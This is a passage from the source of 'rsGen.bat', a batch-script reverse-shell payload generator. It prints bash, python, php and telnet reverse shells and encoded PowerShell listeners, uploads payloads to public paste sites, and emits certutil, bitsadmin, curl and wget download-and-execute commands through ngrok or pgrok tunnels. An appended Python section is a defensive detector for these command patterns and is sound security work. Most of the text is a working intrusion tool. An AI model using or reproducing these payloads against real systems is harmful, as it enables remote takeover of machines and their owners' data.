--retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_host=%%i) 409 | FOR /F tokens^=12^ delims^=^/^\^:^,^" %%i in ('%cd%\include\curl.exe -s --retry 3 --retry-delay 5 --retry-connrefused http://localhost:4040/http/in^|find /i "tcp://"') do (set rs_pgrok_port=%%i) 410 | set rs_listen_host= 411 | set rs_listen_host=!rs_pgrok_host! 412 | echo + Starting the pgrok tcp tunnel 127.0.0.1:!rs_listen_port! ^<==^> !rs_pgrok_host!:!rs_pgrok_port! 413 | rem echo "!rs_pgrok_host!" "!rs_pgrok_port!" 414 | rem echo !rs_n! time... 415 | call :rs_domain2IP_start !rs_pgrok_host! 
416 | 417 | if not "!rs_domain2ip!" == "" ( 418 | set rs_pgrok_host=!rs_domain2ip! 419 | echo 127.0.0.1:!rs_listen_port! ^<==^> !rs_domain2ip!:!rs_pgrok_port! 420 | ) else ( 421 | echo i ! Attempt to convert Pgrok domain name to IP failed. 422 | ) 423 | ) 424 | goto :eof 425 | 426 | ) else ( 427 | echo, 428 | powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\pgrok.exe.'" -f red -n 2>nul 429 | goto :rs_help_start 430 | ) 431 | goto :eof 432 | :rs_pgrok_end 433 | 434 | ::Raw command format output 435 | :rs_windows_command_raw_start 436 | set rs_listen_host=%1 437 | set rs_listen_port=%2 438 | call :rs_powershell_listener_payload_start !rs_listen_host! !rs_listen_port! 439 | if "!rs_os_flag!"=="W10" ( 440 | echo  powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload! 441 | echo, 442 | ) else ( 443 | echo powershell -EP Bypass -NoLogo -NonI -NoP -Enc '!powershell_listener_payload!' 444 | ) 445 | goto :eof 446 | :rs_windows_command_raw_end 447 | 448 | ::rs_powershell_listener_payload_start 449 | :rs_powershell_listener_payload_start 450 | set powershell_listener_payload= 451 | set rs_powershell_listener_payload_pre= 452 | set rs_powershell_listener_payload_suf= 453 | set /p rs_powershell_listener_payload_pre=<%cd%\payload\powershell_listener_1.payload 454 | set /p rs_powershell_listener_payload_suf=<%cd%\payload\powershell_listener_2.payload 455 | set powershell_listener_payload=!rs_powershell_listener_payload_pre!!rs_listen_host!'',!rs_listen_port!!rs_powershell_listener_payload_suf! 456 | powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('!powershell_listener_payload!'))|out-file -Encoding ascii %temp%\powershell_listener.tmp" 2>nul 457 | ::echo !powershell_listener_payload! 
458 | ::type %temp%\powershell_listener.tmp 459 | ::set /p powershell_listener_payload=<%temp%\powershell_listener.tmp 460 | for /f "delims= tokens=1,2" %%i in (%temp%\powershell_listener.tmp) do set powershell_listener_payload=%%i 461 | ::echo !powershell_listener_payload! 462 | goto :eof 463 | ::rs_powershell_listener_payload_end 464 | 465 | :rs_linux_command_raw_start 466 | set rs_listen_host=%1 467 | set rs_listen_port=%2 468 | if "!rs_os_flag!"=="W10" ( 469 | echo  bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 470 | echo, 471 | echo  sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 472 | echo, 473 | echo  0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 474 | echo, 475 | echo  telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 1521 476 | ::echo  ps:Need to additionally listen a port 1521 for command output display 477 | echo, 478 | echo  php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' 479 | echo, 480 | echo  python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' 481 | echo, 482 | ) else ( 483 | echo bash -i^>^&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0^>^&1 484 | echo, 485 | echo sh -i^>^&/dev/udp/!rs_listen_host!/!rs_listen_port! 0^>^&1 486 | echo, 487 | echo 0^<^&196;exec 196^<^>/dev/tcp/!rs_listen_host!/!rs_listen_port!; sh ^<^&196 ^>^&196 2^>^&196 488 | echo, 489 | echo telnet !rs_listen_host! !rs_listen_port!^|/bin/bash^|telnet !rs_listen_host! 
1521 490 | ::echo ps:Need to additionally listen a port 1521 for command output display 491 | echo, 492 | echo php -r '$sock=fsockopen^("!rs_listen_host!",!rs_listen_port!^);exec^("/bin/sh -i <&3 >&3 2>&3"^);' 493 | echo, 494 | echo python -c 'import socket,subprocess,os;s=socket.socket^(socket.AF_INET,socket.SOCK_STREAM^);s.connect^(^("!rs_listen_host!",!rs_listen_port!^)^);os.dup2^(s.fileno^(^),0^); os.dup2^(s.fileno^(^),1^);os.dup2^(s.fileno^(^),2^);import pty; pty.spawn^("/bin/bash"^)' 495 | echo, 496 | ) 497 | goto :eof 498 | :rs_linux_command_raw_end 499 | 500 | ::LAN "transfer command" generation 501 | :rs_command_lan_start 502 | if not exist "%cd%\include\" ( 503 | echo, 504 | powershell -c write-host "' - Missing include directory,Unable to continue generate command!'" -f red -n >nul 505 | ::Missing the include directory, the include directory contains the files "i" & "pcat.ps1", "i" is the generated command. 506 | goto :rs_help_start 507 | ) 508 | if exist "%cd%\include\mongoose.exe" ( 509 | tasklist|find /i "mongoose.exe">nul&&taskkill /f /im mongoose.exe >nul 2>nul 510 | call :rs_set_webport_start 511 | start %cd%\include\mongoose.exe -d %cd%\include\www -l !rs_webport! -start_browser no -enable_dir_listing no 512 | ) else ( 513 | powershell -c write-host "' - Missing file `"%cd%\include\mongoose.exe`",The web service failed to start`,the LAN mode needs to start the web service locally`,so the command will not be executed effectively'" -f red -n 2>nul 514 | ) 515 | 516 | set rs_ps_command_pre_lan= 517 | set ps_command_suf_raw_lan= 518 | set linux_command_raw_lan= 519 | set rs_ps_command_suf_b64_lan= 520 | set rs_command_b64_lan= 521 | 522 | call :rs_powershell_listener_payload_start 523 | set rs_ps_command_b64=!powershell_listener_payload! 524 | ::echo !rs_ps_command_b64! 525 | 526 | set "rs_ps_command_pre_lan=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " 527 | set "linux_command_raw_lan=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 
0>&1" 528 | rem echo !linux_command_raw_lan!.test 529 | call :rs_base64_encode_start "!linux_command_raw_lan!" 530 | set rs_linux_command_b64_lan=%rsgen_b64_res% 531 | set "rs_command_b64_lan=!rs_linux_command_b64_lan!!rs_ps_command_pre_lan!!rs_ps_command_b64!" 532 | echo !rs_command_b64_lan!>%cd%\include\www\i 533 | if not exist "%cd%\include\www\c" ( 534 | copy /y %cd%\payload\c#.payload %cd%\include\www\c >nul 2>nul 535 | ) 536 | 537 | if "!rs_webport!" equ "80" ( 538 | set rs_webport_display= 539 | ) else ( 540 | set "rs_webport_display=:%rs_webport%" 541 | ) 542 | 543 | if "!rs_os_flag!"=="W10" ( 544 | call :rs_info_w10windows_start 545 | echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat 546 | echo, 547 | echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/c cd.bat^|cd.bat 548 | echo, 549 | echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat 550 | echo, 551 | echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^ 552 | echo, 553 | echo  powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload! 
554 | echo, 555 | 556 | call :rs_info_w10linux_start 557 | echo  curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 558 | echo, 559 | echo  wget -qO- http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 560 | echo, 561 | 562 | call :rs_info_wlinux10_start 563 | echo  certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 564 | echo, 565 | echo  bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 566 | echo, 567 | echo  powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 568 | echo, 569 | ) else ( 570 | call :rs_info_w7windows_start 571 | echo powershell -EP Bypass -NoLogo -NonI -NoP -Enc !powershell_listener_payload! 
572 | echo, 573 | echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat 574 | echo, 575 | echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat 576 | echo, 577 | echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%^\cd.bat^|cd.bat 578 | echo, 579 | 580 | call :rs_info_w7linux_start 581 | echo curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 582 | echo, 583 | echo curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 584 | echo, 585 | echo wget -qO- http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 586 | echo, 587 | 588 | call :rs_info_wlinux7_start 589 | echo certutil -urlcache -split -f http://!rs_listen_host!!rs_webport_display!/i cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 590 | echo, 591 | echo powershell "Import-Module BitsTransfer;start-bitstransfer http://!rs_listen_host!!rs_webport_display!/i cd.bat"^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 592 | echo, 593 | echo bitsadmin /transfer n http://!rs_listen_host!!rs_webport_display!/i %%cd%%\cd.bat^|cd.bat^|^|curl http://!rs_listen_host!!rs_webport_display!/i^|base64 -d^|bash 594 | echo, 595 | ) 596 | goto :eof 597 | :rs_command_lan_end 598 | 599 | :rs_command_generate_pub_output_windowsw10_start 600 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat 601 | echo, 602 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! cmd 603 | echo, 604 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! powershell 605 | echo, 606 | if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_base64_payload_url! 
%%cd%%\cd.bat^|cd.bat 607 | echo, 608 | if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module bitstransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"^|cd.bat 609 | echo, 610 | goto :eof 611 | :rs_command_generate_pub_output_windowsw10_end 612 | 613 | :rs_command_generate_pub_output_linuxw10_start 614 | if "!rs_pastebin_status!"=="0" echo  curl !rs_base64_payload_url!^|base64 -d^|bash 615 | echo, 616 | if "!rs_pastebin_status!"=="0" echo  wget -qO- !rs_base64_payload_url!^|base64 -d^|bash 617 | echo, 618 | goto :eof 619 | :rs_command_generate_pub_output_linuxw10_end 620 | 621 | :rs_command_generate_pub_output_wl10_start 622 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 623 | echo, 624 | if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 625 | echo, 626 | if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 627 | echo, 628 | if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module BitsTransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 629 | echo, 630 | goto :eof 631 | :rs_command_generate_pub_output_wl10_end 632 | 633 | :rs_command_generate_pub_output_windowsw7_start 634 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat 635 | echo, 636 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! cmd 637 | echo, 638 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat !rs_listen_host! !rs_listen_port! 
powershell 639 | echo, 640 | if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat 641 | echo, 642 | if "!rs_pastebin_status!"=="0" echo powershell "Import-Module bitstransfer;start-bitstransfer !rs_base64_payload_url! cd.bat"^|cd.bat 643 | echo, 644 | goto :eof 645 | :rs_command_generate_pub_output_windowsw7_end 646 | 647 | :rs_command_generate_pub_output_linuxw7_start 648 | if "!rs_pastebin_status!"=="0" echo curl !rs_base64_payload_url!^|base64 -d^|bash 649 | echo, 650 | if "!rs_pastebin_status!"=="0" echo wget -qO- !rs_base64_payload_url!^|base64 -d^|bash 651 | echo, 652 | if "!rs_pastebin_status!"=="0" echo wget -qO- !rs_base64_payload_url!^|base64 -d^|bash 653 | echo, 654 | goto :eof 655 | :rs_command_generate_pub_output_linuxw7_end 656 | 657 | :rs_command_generate_pub_output_wl7_start 658 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_base64_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 659 | echo, 660 | if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_c#_payload_url! cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 661 | echo, 662 | if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_base64_payload_url! %%cd%%\cd.bat^|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash 663 | echo, 664 | if "!rs_pastebin_status!"=="0" echo "powershell "Import-Module BitsTransfer;start-bitstransfer !rs_base64_payload_url! 
cd.bat"|cd.bat^|^|curl !rs_base64_payload_url!^|base64 -d^|bash" 665 | echo, 666 | goto :eof 667 | :rs_command_generate_pub_output_wl7_end 668 | 669 | ::Command generation 670 | :rs_command_generate_pub_start 671 | set rs_ps_command_suf_b64= 672 | set rs_linux_command_b64= 673 | set rs_command_b64= 674 | set rs_listen_host=%1 675 | set rs_listen_port=%2 676 | set "rs_ps_command_pre=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " 677 | call :rs_powershell_listener_payload_start 678 | set "linux_command_raw=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" 679 | call :rs_base64_encode_start "!linux_command_raw!" 680 | set rs_linux_command_b64=%rsgen_b64_res% 681 | set rs_ps_command_suf_b64=!powershell_listener_payload! 682 | ::echo %rs_ps_command_suf_b64% 683 | set "rs_command_b64=!rs_linux_command_b64!!rs_ps_command_pre!!rs_ps_command_suf_b64!" 684 | rem echo !rs_command_b64! 685 | call :rs_command_upload_start !rs_listen_host! !rs_listen_port! 686 | if "!rs_pastebin_status!"=="-1" ( 687 | echo, 688 | powershell -c write-host "' Command upload failed, make sure you can access the internet, check local proxy settings, or make sure the pastebin API is available'" -f red 2>nul 689 | goto :rs_help_start 690 | ) 691 | goto :eof 692 | :rs_command_generate_pub_end 693 | 694 | ::Upload command to pastebin 695 | :rs_command_upload_start 696 | set rs_pastebin_api= 697 | echo i Uploading payload to pastebin,please wait... 698 | call :rs_pastebin_api_start %cd%\include\rs_pastebin.api 699 | rem echo !rs_pastebin_api! 700 | if exist "%cd%\include\curl.exe" ( 701 | set rs_c#_payload_url= 702 | set rs_listen_host=%1 703 | set rs_listen_port=%2 704 | set rs_pastebin_status=0 705 | echo !rs_command_b64!>%cd%\payload\rs_base64.payload 706 | if "!rs_pastebin_api!" 
== "https://p.ip.fi/" ( 707 | set rs_base64_payload_url= 708 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "paste=<%cd%\payload\rs_base64.payload" https://p.ip.fi') do (set rs_base64_payload_url=%%i) 709 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "paste=<%cd%\payload\c#.payload" https://p.ip.fi') do (set rs_c#_payload_url=%%i) 710 | set rs_base64_payload_url=!rs_base64_payload_url!.txt 711 | set rs_c#_payload_url=!rs_c#_payload_url!.txt 712 | ) 713 | 714 | if "!rs_pastebin_api!" == "https://dpaste.com/api/v2/" ( 715 | set rs_base64_payload_url= 716 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "content=<%cd%\payload\rs_base64.payload" https://dpaste.com/api/v2/') do (set rs_base64_payload_url=%%i) 717 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -s -F "content=<%cd%\payload\c#.payload" https://dpaste.com/api/v2/') do (set rs_c#_payload_url=%%i) 718 | set rs_base64_payload_url=!rs_base64_payload_url!.txt 719 | set rs_c#_payload_url=!rs_c#_payload_url!.txt 720 | ) 721 | 722 | if "!rs_pastebin_api!" 
== "https://paste.teknik.io/Action/Paste" ( 723 | set rs_base64_payload_url= 724 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "content=<%cd%\payload\rs_base64.payload" https://paste.teknik.io/Action/Paste') do (set rs_base64_payload_url=%%i) 725 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "content=<%cd%\payload\c#.payload" https://paste.teknik.io/Action/Paste') do (set rs_c#_payload_url=%%i) 726 | FOR /F "tokens=3 delims==/" %%i in ("!rs_base64_payload_url!") do (set rs_base64_payload_url=%%i) 727 | FOR /F "tokens=3 delims==/" %%i in ("!rs_c#_payload_url!") do (set rs_c#_payload_url=%%i) 728 | set rs_base64_payload_url=https://paste.teknik.io/raw/!rs_base64_payload_url! 729 | set rs_c#_payload_url=https://paste.teknik.io/raw/!rs_c#_payload_url! 730 | ) 731 | 732 | if "!rs_pastebin_api!" == "https://ghostbin.co/paste/new" ( 733 | set rs_base64_payload_url= 734 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "text=<%cd%\payload\rs_base64.payload" https://ghostbin.co/paste/new') do (set rs_base64_payload_url=%%i) 735 | FOR /F %%i in ('%cd%\include\curl.exe --retry 3 --retry-delay 5 --retry-connrefused -ks -w "%%{redirect_url}" -o nul -F "text=<%cd%\payload\c#.payload" https://ghostbin.co/paste/new') do (set rs_c#_payload_url=%%i) 736 | FOR /F "tokens=4 delims==/" %%i in ("!rs_base64_payload_url!") do (set rs_base64_payload_url=%%i) 737 | FOR /F "tokens=4 delims==/" %%i in ("!rs_c#_payload_url!") do (set rs_c#_payload_url=%%i) 738 | set rs_base64_payload_url=https://ghostbin.co/paste/!rs_base64_payload_url!/raw 739 | set rs_c#_payload_url=https://ghostbin.co/paste/!rs_c#_payload_url!/raw 740 | rem echo !rs_base64_payload_url! 741 | rem echo !rs_c#_payload_url! 
742 | ) 743 | 744 | ) else ( 745 | echo, 746 | powershell -c write-host "' - Unable to start Service,Missing file %cd%\include\curl.exe.'" -f red -n 2>nul 747 | goto :rs_help_start 748 | ) 749 | 750 | if not "!rs_base64_payload_url!" == "" ( 751 | echo + Base64 Payload URL: !rs_base64_payload_url! 752 | echo + C# Payload URL: !rs_c#_payload_url! 753 | ) else ( 754 | powershell -c write-host "' ! Failed to get a payload URL from the pastebin service.'" -f red -n 2>nul 755 | ) 756 | 757 | exit /b 0 758 | 759 | 760 | ::banner 761 | :rs_banner_w7_start 762 | echo ______ ________ ____ _____ 763 | echo .' ___ ^|^|_ __ ^|^|_ \^|_ _^| 764 | echo _ .--. .--. / .' \_^| ^| ^|_ \_^| ^| \ ^| ^| 765 | echo [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| 766 | echo ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ 767 | echo [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.1.2 768 | echo, 769 | goto :eof 770 | :rs_banner_w7_end 771 | 772 | :rs_banner_w10_start 773 | echo  ______ ________ ____ _____ 774 | echo  .' ___ ^|^|_ __ ^|^|_ \^|_ _^|  775 | echo  _ .--. .--. / .' 
\_^| ^| ^|_ \_^| ^| \ ^| ^| 776 | echo  [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| 777 | echo  ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ 778 | echo  [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.1.2 779 | echo, 780 | goto :eof 781 | :rs_banner_w10_end 782 | 783 | :rs_info_w10windows_start 784 | echo  Windows Payload  785 | echo, 786 | goto :eof 787 | :rs_info_w10windows_end 788 | 789 | :rs_info_w7windows_start 790 | powershell -c write-host "' Windows Payload'" -f yellow 2>nul 791 | echo, 792 | goto :eof 793 | :rs_info_w7windows_end 794 | 795 | :rs_info_w10linux_start 796 | echo  Linux Payload 797 | echo, 798 | goto :eof 799 | :rs_info_w10linux_end 800 | 801 | :rs_info_w7linux_start 802 | powershell -c write-host "' Linux Payload'" -f yellow 2>nul 803 | echo, 804 | goto :eof 805 | :rs_info_w7linux_end 806 | 807 | :rs_info_wlinux10_start 808 | echo  Windows^&Linux Payload 809 | echo, 810 | goto :eof 811 | :rs_info_wlinux10_end 812 | 813 | :rs_info_wlinux7_start 814 | powershell -c write-host "' Windows&Linux Payload'" -f yellow 2>nul 815 | echo, 816 | goto :eof 817 | :rs_info_wlinux7_end 818 | 819 | ::help info 820 | :rs_help_start 821 | echo, 822 | echo This is a Reverse Shell Payload Generator. 823 | echo, 824 | echo Usage: %~nx0 host port [options] 825 | echo Options: 826 | echo -pub If the target can access the public network, use it. 827 | echo -lan If the target cannot access the Internet, use it. 828 | echo -listen If you need to listen the port, use it. 829 | echo -ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options). 830 | echo -pgrok Start pgrok TCP Tunnel(like ngrok but free and unlimited). 
831 | echo, 832 | echo Examples: %~nx0 8.8.8.8 8888 833 | echo %~nx0 8.8.8.8 8888 -pub 834 | echo %~nx0 192.168.31.216 8888 -lan 835 | echo %~nx0 192.168.31.216 8888 -listen 836 | echo %~nx0 192.168.31.216 8888 -lan -listen 837 | echo %~nx0 8888 -ngrok 838 | echo %~nx0 8888 -pgrok 839 | exit /b 0 840 | :rs_help_end -------------------------------------------------------------------------------- /runcmd.bat: -------------------------------------------------------------------------------- 1 | @cmd /k cd %cd%\ --------------------------------------------------------------------------------
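
For defenders: the command templates echoed by `rsGen.bat` above share a small set of stable command-line features (`certutil -urlcache -split -f`, `bitsadmin /transfer`, `start-bitstransfer`, `-EP Bypass ... -Enc`, a download piped through `base64 -d` into a shell, and `/dev/tcp` redirection). The following is an added detection example, not part of rsGen; the rule names, the sample command lines and the `192.0.2.10` address are constructed for illustration.

```python
import base64
import re

# Command-line features shared by the templates rsGen.bat prints (see above).
# Rule names are made up for this example.
RULES = [
    ("certutil_urlcache_download",
     re.compile(r"certutil(?:\.exe)?\s+-urlcache\s+-split\s+-f\s+https?://", re.I)),
    ("bitsadmin_transfer",
     re.compile(r"bitsadmin(?:\.exe)?\s+/transfer\s+\S+\s+https?://", re.I)),
    ("bitstransfer_cmdlet",
     re.compile(r"start-bitstransfer\s+https?://", re.I)),
    ("powershell_bypass_encoded",
     re.compile(r"powershell(?:\.exe)?\b.*\s-EP\s+Bypass\b.*\s-Enc(?:odedCommand)?\s", re.I)),
    ("download_base64_to_shell",
     re.compile(r"(?:curl|wget\s+-qO-)\s+[^\s|]+\s*\|\s*base64\s+-d\s*\|\s*(?:ba)?sh\b", re.I)),
    ("shell_dev_tcp_redirect",
     re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    ("download_piped_to_same_file",
     re.compile(r'cd\.bat"?\s*\|\s*cd\.bat\b', re.I)),
]

# -Enc takes base64 of UTF-16LE text; the script also prints a single-quoted form.
ENC_ARG = re.compile(r"\s-Enc(?:odedCommand)?\s+'?([A-Za-z0-9+/=]{8,})'?", re.I)


def decode_encoded_command(cmdline):
    """Decode a PowerShell -Enc argument; return None if absent or not valid."""
    match = ENC_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None


def scan(cmdline):
    """Return the names of matching rules plus the decoded -Enc text, if any."""
    return {
        "rules": [name for name, rx in RULES if rx.search(cmdline)],
        "decoded": decode_encoded_command(cmdline),
    }


# Constructed sample data: 192.0.2.10 is a documentation address and the
# encoded command is a harmless Write-Output call.
_ENC = base64.b64encode("Write-Output 'inventory ok'".encode("utf-16-le")).decode()
SAMPLE_CMDLINES = [
    "certutil -urlcache -split -f http://192.0.2.10/i cd.bat|cd.bat",
    r"bitsadmin /transfer n http://192.0.2.10:8080/i C:\Users\a\cd.bat|cd.bat",
    "powershell -EP Bypass -NoLogo -NonI -NoP -Enc " + _ENC,
    "curl http://192.0.2.10/i|base64 -d|bash",
    "bash -i>&/dev/tcp/192.0.2.10/8888 0>&1",
    r"certutil -hashfile C:\Windows\notepad.exe SHA256",  # benign, no rule should match
    "curl -s https://example.com/health",                 # benign, no rule should match
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = scan(line)
        print(result["rules"] or "-", "|", line[:60])
        if result["decoded"]:
            print("    decoded -Enc:", result["decoded"])
```

On Windows, the command lines to feed into `scan` come from process-creation logging, for example Security event 4688 with command-line auditing enabled or Sysmon event ID 1.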